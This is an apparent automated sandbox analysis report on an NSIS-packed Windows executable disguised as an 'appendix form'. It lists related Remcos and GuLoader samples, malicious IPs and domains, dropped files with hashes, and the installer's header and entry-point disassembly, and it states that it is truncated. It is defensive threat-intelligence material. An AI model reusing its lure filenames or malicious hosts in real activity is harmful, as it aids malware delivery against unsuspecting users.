• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data
• VT rate limit hit for: APPENDIX FORM_N#U00b045013-20241120.com.exe

The analysis ended on timeout and the report is truncated by call volume (NtOpenKeyEx, NtQueryValueKey, NtReadVirtualMemory), so the absence of a behaviour in this report is not evidence that the sample lacks it.
Simulations (Time | Type | Description)
06:20:52 | API Interceptor | 92066x Sleep call for process APPENDIX FORM_N#U00b045013-20241120.com.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        178.237.33.50wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                        • geoplugin.net/json.gp
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        s-part-0017.t-0009.t-msedge.netPayslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                        • 13.107.246.45
                                                                                        phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        CB1.exeGet hashmaliciousBlackMoonBrowse
                                                                                        • 13.107.246.45
                                                                                        +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.45
                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                        • 13.107.246.45
                                                                                        geoplugin.netwE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                        • 178.237.33.50
                                                                                        ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        • 178.237.33.50
                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                        • 178.237.33.50
                                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
                                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        • 178.237.33.50
                                                                                        Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                        • 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: AS40676US
• https://ambir.com/ambir-card-scanners/ | malicious | CAPTCHA Scam ClickFix | 45.61.136.196
• https://ambir.com/ | malicious | CAPTCHA Scam ClickFix | 45.61.136.196
• https://ambir.com/ambir-card-scanners/ | malicious | CAPTCHA Scam ClickFix | 45.61.136.196
• KRcLFIz5PCQunB7.exe | malicious | Quasar | 103.126.138.87
• mipsel.nn.elf | malicious | Mirai, Okiru | 76.74.72.61
• 08e2VwqyI0.dll | malicious | Unknown | 107.160.131.254
• PqZ6GU98Eh.dll | malicious | Unknown | 107.160.131.252
• jYAKmjIPgI.dll | malicious | Unknown | 107.160.131.254
• 81mieek02V.dll | malicious | Unknown | 107.160.131.254
• Vb1S2HJcnN.dll | malicious | Unknown | 107.160.131.254
Match: ATOM86-ASATOM86NL
• wE1inOhJA5.msi | malicious | Remcos, RHADAMANTHYS | 178.237.33.50
• ORDER AND SPECIFICATIONS.scr.exe | malicious | Remcos | 178.237.33.50
• 1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe | malicious | Remcos | 178.237.33.50
• 1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exe | malicious | Remcos | 178.237.33.50
• seethebestthignswhichgivingbestopportunities.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 178.237.33.50
• pi-77159.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
• sostener.vbs | malicious | Remcos | 178.237.33.50
• 1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos | 178.237.33.50
• USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | 178.237.33.50
• Pago_BBVA.pdf.bat.exe | malicious | Remcos | 178.237.33.50
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dll
• OFFER KH-20241024.exe | malicious | GuLoader
• OFFER KH-20241024.exe | malicious | GuLoader
• Belialist.exe | malicious | Remcos, GuLoader
• WnsTnPaieH.exe | malicious | GuLoader
• WnsTnPaieH.exe | malicious | GuLoader
• LisectAVT_2403002B_95.exe | malicious | Unknown
• RFQ-PRECISE PO #2798106_PDF.exe | malicious | GuLoader
• RFQ-PRECISE PO #2798106_PDF.exe | malicious | GuLoader
• Revised PI_2024.exe | malicious | GuLoader, Snake Keylogger
• Revised PI_2024.exe | malicious | GuLoader

Process: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
File Type: MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category: dropped
Size (bytes): 893
Entropy (8bit): 2.936301410587607
Encrypted: false
SSDEEP: 12:8wl0Oi/kdvrHj4/3BVwzyDilfObBW+sljm3kXg1MJ8N0HRqTM:8izD4/B4K/wm3oDRp
MD5: DA633DA19A98DD95BCB5F9E953522B64
SHA1: B8DB75E73A1B206CB1C857323BAB7A33930E18AF
SHA-256: 30D66E8AAAD4B7E644E4D6E0163B858ED9CAA15687425FC0C45D1937B46C0CDE
SHA-512: 26993ECAA0D27E9622ED134C556B9EB4AAC2B862736F6F941FDE5B6CFA6018E709715108D53C712375FDC3B018B8F39E071FCB6523488E3F914CE0E5966D7E7B
Malicious: false
Reputation: low
                                                                                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................b.1...........ProgramData.H............................................P.r.o.g.r.a.m.D.a.t.a.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........Templates.D............................................T.e.m.p.l.a.t.e.s.....b.2...........jeblets.Bul.H............................................j.e.b.l.e.t.s...B.u.l.......<.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.j.e.b.l.e.t.s...B.u.l.W.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.O.r.k.e.s.t.r.a.l.\.V.a.g.i.n.o.v.e.s.i.c.a.l.4.1.\.b.i.o.g.e.o.c.h.e.m.i.s.t.r.y.\.b.e.v.b.n.i.n.g.e.n.....

Process: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.015105568788186
Encrypted: false
SSDEEP: 12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 8937B63DC0B37E949F38E7874886D999
SHA1: 62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
SHA-256: AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
SHA-512: 077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
Malicious: false
Reputation: low
                                                                                                            Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Process: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xc350c1bd, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 14680064
Entropy (8bit): 0.9773417578112378
Encrypted: false
SSDEEP: 6144:YgMnQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SU8GxJHL:5n/cj5tND5ApBK4K
MD5: E211FD8DD8F5B0129909077F090780B4
SHA1: 01551769117DAA5A65350A26D750658556E84775
SHA-256: 57D57E3D7084FC39D1A430D7E4F02EE564EF93D088791B718A8AD00D6CFAABCC
SHA-512: D029672E2C1E7D448540350EA18FCEBBB5C109584E88FD4B3EA809F5390B98DBE423EEB0DA03F79BC348252B3CB57A8693E6C6C6CA73DEF55EB6ECD8007B64BF
Malicious: false
Reputation: low
                                                                                                            Preview:.P..... ................./..(...{........................&.....'6...{.......|..h.(.........................:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... .......93...{a..............................................................................................................................................................................................(...{...........................................|...................~.u.....|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: modified
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: high, very likely benign file
                                                                                                            Preview:..

Process: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 11264
Entropy (8bit): 5.76003797720627
Encrypted: false
SSDEEP: 192:jVL7iZJX76BiqsO7+UZEw+RlthVEoC0O3XB:g7ssOpZs/hS3X
MD5: 960A5C48E25CF2BCA332E74E11D825C9
SHA1: DA35C6816ACE5DAF4C6C1D57B93B09A82ECDC876
SHA-256: 484F8E9F194ED9016274EF3672B2C52ED5F574FB71D3884EDF3C222B758A75A2
SHA-512: CC450179E2D0D56AEE2CCF8163D3882978C4E9C1AA3D3A95875FE9BA9831E07DDFD377111DC67F801FA53B6F468A418F086F1DE7C71E0A5B634E1AE2A67CD3DA
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: OFFER KH-20241024.exe, Detection: malicious
• Filename: OFFER KH-20241024.exe, Detection: malicious
• Filename: Belialist.exe, Detection: malicious
• Filename: WnsTnPaieH.exe, Detection: malicious
• Filename: WnsTnPaieH.exe, Detection: malicious
• Filename: LisectAVT_2403002B_95.exe, Detection: malicious
• Filename: RFQ-PRECISE PO #2798106_PDF.exe, Detection: malicious
• Filename: RFQ-PRECISE PO #2798106_PDF.exe, Detection: malicious
• Filename: Revised PI_2024.exe, Detection: malicious
• Filename: Revised PI_2024.exe, Detection: malicious
Reputation: moderate, very likely benign file
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....f.R...........!................+'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...o........................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..J....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
File Type: data
Category: dropped
Size (bytes): 2754450
Entropy (8bit): 2.763327921798719
Encrypted: false
SSDEEP: 12288:ZcPmkqOoXkqsMNFCR/K9Y96MBP6gFXjHltwSO:6uHkqBNFB8mSO
MD5: 7B398928CCED4A3135684B1E41DF7418
SHA1: 525FF70F19B38AB7D21A479E02924F418B3F6397
SHA-256: 45B1FCBB27506DAD920EC4112ED755963FB4B92A2EA0CEDA416104EBED25717A
SHA-512: 20BB50AA8D89D1951B7A29DF125D089355782E481694B31A897D7D290782757C3D91BEB818E74749B5F41FFC89C71EDBFC591A46ED95901F521814A764CE8360
Malicious: false
                                                                                                            Preview:.G......,...................n....1.......F.......G..........................................................................................................................................................................................................................................J...x...............j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 557
Entropy (8bit): 4.197322697341542
Encrypted: false
SSDEEP: 12:PbM4addO1mhuJESFoo7QVZAy8WKeVLwMXTRIyZOBLOLpEgIaJjM5C4A6Oa:1yuKloMI7WKeLrXdI8OxO6kO
MD5: 434C299BF0F32D2C335F68A2C810E905
SHA1: 536A77F641BBAB16B3A2E9E47840E98092678959
SHA-256: 37F30AC7357896F124ABA52018116ED9789F57B3AA7AE596D9C9EBC09E28C8F8
SHA-512: D95055A0260DEE2BC209E2B06D55D1BB4F5B4F5317FA36DA9603BFF61D43C28119C4C380B890BF4FCDD61B18EEC0EC2AFC3F5A1349B68EEA9C9E9DE4D848ABD0
Malicious: false
                                                                                                            Preview:gingered ablatitious regredierer forfatningsraad unperplex philonatural gennemhegl toholdsskift foragter garantibetalingernes dissertations lreanstalterne unsereneness..fagus satinpwr fiscals udsorteringers reimpel.taffelmusik socialdemokratismens gyrene fjordmundingens tilkbsbilletters fyringssedlens hutlende uninfixed unpedestal trisulc apolog..pli neurolytic klabautermandens sammenkdningen smrrebrdsseddel fustigations dgninstitution.rumvgtenes ansttelsestiden statuslinjers shoppen yuri morskabslsningers,instore mennonist smugryges inkhorns fjerdes,

Process: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 433906
Entropy (8bit): 2.6471516444077823
Encrypted: false
SSDEEP: 1536:sMEjsYO+ZwRA2UP/+rcU6lL3GKMTcP0q01WkVvPKh3k+K2lNWKP7zfn5k7Ui4uLe:wHR/SJ9YqvsH76MBTLwrgXVRBM9qJ
MD5: 6B82BFD87DAB351ADA3FD5DFA679A6D3
SHA1: 796A6B68832A8623836DD3B8A772B55D76524D87
SHA-256: 4CDC88E916FD12037F14C7D4A0D8D35CBD3CB86EB1D3E5A92F15B1EA04F5A1A1
SHA-512: 32AFEC2DBFAE3DE66FE0DDE49AAF6BE48DD84429F74065D9B0DDBF31F23001E2D92F00BB0163216DAB7EEF83B15224B9F219F43BDE9B77741C210D593774E1C4
Malicious: false
                                                                                                            Preview:002E2E2E000000000000004000868600007373730000F0009D00000000000000F6000000000000008787009898989800005A000000EBEBEB00004A0000A8006400003E3E000096969696006B6B6B0007007676000000F2F20000000B00009F9F9F00BABABABABA00000000F3F3F3F30000000C00BF0000DC00000000EAEA00F900004242424242420000BC000000000000CC00005C00004242424200000000242400E3E3E30033333300007200FBFBFBFBFB00B4000000000000009A9A9A00757500240000A4A4A400003D3D3D3D3D3D3D3D3D006B00003F0000000017171700009E008181810000EFEFEFEF00008787870099005200000000F9F9F9F90000EA00BD000074747400100000989800003C3C00B1000000B1B100008787878700A8A8A8A80000000055000000898989898989008B8B8B8B8B8B8B0000080000000000000000C400009900CCCC000000D8D80000AE0062006E6E0000006B00000000D5D5000000000808000000000000E2000000000000000000001E1E000000003A00002E00000B0000F7F700430000009F9F000000640073000000120000006E000000BB000000C3C30003000000D2D2D200CBCB0000009A9A9A0000F5003500000000000101006D6D005151000070001D0019006E001A1A007E0000004B00009E005B5B5B5B00AD0000E100C1001C0000008600F6
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):211862
                                                                                                            Entropy (8bit):7.538594537719835
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:6bvWNP1oiSnUjbalQX7cCGNQCcugYSsj2qiknkD3OJYKJ93x3VGcMyqF:svkP1oiSUqOX4XcuqNqvkD3ZKNF2
                                                                                                            MD5:613352ABF113D950208409A1311076F6
                                                                                                            SHA1:70A9380D25CB694F30A0CFB8B6C9482EDDC70258
                                                                                                            SHA-256:94783C7BAECF05C33F714D59402203986F4D7E6046AE1200EA3F6E6A1DF6F220
                                                                                                            SHA-512:E374D791853647FA08D9A1719E453F9FF9555BD5562A8DC8A5BB20EE810F43EE10B6A90C6689A15E47A78E5E894A72CD0B0918A4A0F4F1354F45DEDD987E0603
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):392055
                                                                                                            Entropy (8bit):1.2526489998571093
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:uTCaMstHH+6np+6BwgRZJUxd5i8Rl24uNKn9VaUdrruMBUTXA9esA/1wb1Hhca9q:uGax6CMtRTvhpMwt4rk3f3jf25oXuf
                                                                                                            MD5:ED7C57BA1529F8D13732CC6B99721FB7
                                                                                                            SHA1:8F6FFB5E3920D6A672C3936FD3A370632C11546A
                                                                                                            SHA-256:364E19ECA1F5E914EC18248BBE50AD3DAD1D2BB15764233DB86264CE55554D99
                                                                                                            SHA-512:8C107D84EB8B93351149943B0435EB6643BADA0434189BD949BCD32CD15918B9BA75653D65DA8FA7EA845AE7C197E2DD43CCBE25A2629D4DFB925C6E473BA073
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):499341
                                                                                                            Entropy (8bit):1.257602995058174
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:71AAor4xonXRCx0qoKFK2JhNtFiw4VU4fkYqW0R/XRGbx4XcV1v:GAnxoXsxzH9PSRR
                                                                                                            MD5:0F6E4F4F20252DB6C5504BA0799DCA3E
                                                                                                            SHA1:3313120B60060D64E127886547F7A94587539B59
                                                                                                            SHA-256:6994ECBE245DEE5A42F4CD6AE12256DFA2022DB5AE9B9B670C0C1D48C1FC7077
                                                                                                            SHA-512:F0FF5D7EC15978F0DB2E6EB91017934C7ADBF4DF41DC3EA0F815D56C938A0C080254A146C23BBB7C01A5262B87646DD0DA5DE501D8AA259709DA98C34591D5EE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):499358
                                                                                                            Entropy (8bit):1.2605028775808527
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:B1R9JwZYA101R2LWExs5j7RNzaNUP8rweI/V1Ss:HSg2LUPxb
                                                                                                            MD5:53FF5B5504F5367EB38A0957993B4947
                                                                                                            SHA1:BC495C3035BC47B4E9881721955FB2B8E531CC17
                                                                                                            SHA-256:31D0CA93FCF41326A2C67AC1D5399B909EEBF03867D86745194881D4FBC5AAEF
                                                                                                            SHA-512:A31FDB628CA38830ECD7AF143CE82F52D91D6930EE7A388A4495ED90B471FC0349D2493C33AC6700D09B61855514D162E612C0DBB60AD4006921368908E36976
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):357199
                                                                                                            Entropy (8bit):1.2489198861145303
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:EVIsFuI5buRa/yx8HTjevJtWy6hRD4GGgIZF+dDe5KD21HgA5dMOwaegt5Q3N4Z9:uhN7qNd/3foUkBzEeCGRKF
                                                                                                            MD5:ADA17684B51AC6E18BE17CB5EE4A6C9F
                                                                                                            SHA1:3BD970BD6D87494AA55E4C8A536E0FC098D2AFB4
                                                                                                            SHA-256:38E7A754D867BFC91C202DCF6396E02CB6D3F42F568ACE3E0C33567342539333
                                                                                                            SHA-512:73480F99FBF2551B9C673614CF6048F2CCCBCD361701B7DEDE26279C5ED7DF52514461931F303F7304FBF1EAF1A61FE5D1FEBDDD251104AA4527DB68EEB54BE7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):330434
                                                                                                            Entropy (8bit):1.2465006888742005
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:mPe712kYmEFBOfQxtXM9NQ105AvipCJvjgO1mIyC+XL/wHMqkz3uheycYf2vKzZv:iXOs6QlMkA7KzZ7XIUy67q3q
                                                                                                            MD5:FBAC61CC2070488CFD0ECD5EE323F42D
                                                                                                            SHA1:FC9AEBD5CA7B740AB1CB22B4B0630DA10F1ED2B3
                                                                                                            SHA-256:8AEBDA149767FEC02BF703ED200F14CA41B9461E1FB362D6DFD86AFCD4222DA4
                                                                                                            SHA-512:64C36FFB07804F82118FF42F063EE124EC423A14D78DD9C6D717AD553B9004948AE7552BDBCE164463458A1B58B5EEE22ACB0664A1318725167B3985DA5AEC9B
                                                                                                            Malicious:false
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Entropy (8bit):7.975036130437581
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            File size:697'930 bytes
                                                                                                            MD5:cf4530628bdb401e066ea81e86403d77
                                                                                                            SHA1:b929d4f89e537b8f932bebc75df0959ef9b406ee
                                                                                                            SHA256:e721952c765bb39555f2aa9f2141649fe2c1f2700224513c2860c8a7e25d2260
                                                                                                            SHA512:ab29e221be8b0b8318ebcd97d638034bf80368221713e15b3b016a0aa42f2f142c2ce2de68d3eb8a99a6d65e43a6268ea1a4db0f7436f6bcc5ff0e222c691d4a
                                                                                                            SSDEEP:12288:+3vFfP1t7YQ6RTw6F+i4nGxcigHvPyagJQMzoocD/f9Lw:A1r7YQ9lcc9Hv0QMzoZpw
                                                                                                            TLSH:9BE423111DD468EEF15799702437EA72F369EC211F40655AAB803FF2EC39E93C82568A
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........2.......p....@
                                                                                                            Icon Hash:326e7b795c770747
                                                                                                            Entrypoint:0x403219
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x52BA66AF [Wed Dec 25 05:01:35 2013 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f
                                                                                                            Instruction
                                                                                                            sub esp, 00000184h
                                                                                                            push ebx
                                                                                                            push ebp
                                                                                                            push esi
                                                                                                            xor ebx, ebx
                                                                                                            push edi
                                                                                                            mov dword ptr [esp+18h], ebx
                                                                                                            mov dword ptr [esp+10h], 00409130h
                                                                                                            mov dword ptr [esp+20h], ebx
                                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                                            call dword ptr [00407034h]
                                                                                                            push 00008001h
                                                                                                            call dword ptr [004070B4h]
                                                                                                            push ebx
                                                                                                            call dword ptr [0040728Ch]
                                                                                                            push 00000008h
                                                                                                            mov dword ptr [00423798h], eax
                                                                                                            call 00007FBF6CD52E62h
                                                                                                            mov dword ptr [004236E4h], eax
                                                                                                            push ebx
                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                            push 00000160h
                                                                                                            push eax
                                                                                                            push ebx
                                                                                                            push 0041ECA0h
                                                                                                            call dword ptr [00407164h]
                                                                                                            push 004091E4h
                                                                                                            push 00422EE0h
                                                                                                            call 00007FBF6CD52B0Ch
                                                                                                            call dword ptr [004070B0h]
                                                                                                            mov ebp, 00429000h
                                                                                                            push eax
                                                                                                            push ebp
                                                                                                            call 00007FBF6CD52AFAh
                                                                                                            push ebx
                                                                                                            call dword ptr [00407118h]
                                                                                                            cmp byte ptr [00429000h], 00000022h
                                                                                                            mov dword ptr [004236E0h], eax
                                                                                                            mov eax, ebp
                                                                                                            jne 00007FBF6CD500BCh
                                                                                                            mov byte ptr [esp+14h], 00000022h
                                                                                                            mov eax, 00429001h
                                                                                                            push dword ptr [esp+14h]
                                                                                                            push eax
                                                                                                            call 00007FBF6CD5258Ah
                                                                                                            push eax
                                                                                                            call dword ptr [00407220h]
                                                                                                            mov dword ptr [esp+1Ch], eax
